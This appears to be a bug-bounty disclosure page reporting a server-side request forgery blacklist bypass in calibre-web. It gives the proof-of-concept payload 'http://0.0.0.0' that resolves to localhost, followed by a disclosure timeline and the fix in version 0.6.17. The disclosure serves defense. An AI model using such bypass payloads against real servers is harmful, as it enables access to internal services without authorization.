Server-Side Request Forgery (SSRF) in janeczku/calibre-web

Valid

Reported on

Feb 21st 2022


Description

Bypass of this report: https://huntr.dev/bounties/499688c4-6ac4-4047-a868-7922c3eab369/

Proof of Concept

Blacklist does not check for 0.0.0.0

PAYLOAD: http://0.0.0.0

This payload will be resolved to localhost

>>> import socket
>>> from urllib.parse import urlparse
>>> PAYLOAD = 'http://0.0.0.0'
>>> socket.getaddrinfo(urlparse(PAYLOAD).hostname, 0)[0][4][0]
'0.0.0.0'

Impact

SSRF

We are processing your report and will contact the janeczku/calibre-web team within 24 hours. 2 years ago
We have contacted a member of the janeczku/calibre-web team and are waiting to hear back 2 years ago
We have sent a follow up to the janeczku/calibre-web team. We will try again in 4 days. 2 years ago
janeczku validated this vulnerability 2 years ago
r0hansh has been awarded the disclosure bounty
The fix bounty is now up for grabs
Rohan Sharma
2 years ago

Researcher


Suggested fix: use ipaddress to implement localhost/internal network ip addresses checks.

We have sent a fix follow up to the janeczku/calibre-web team. We will try again in 7 days. 2 years ago
janeczku marked this as fixed in 0.6.17 with commit 965352 2 years ago
The fix bounty has been dropped
helper.py#L736-L737 has been validated
to join this conversation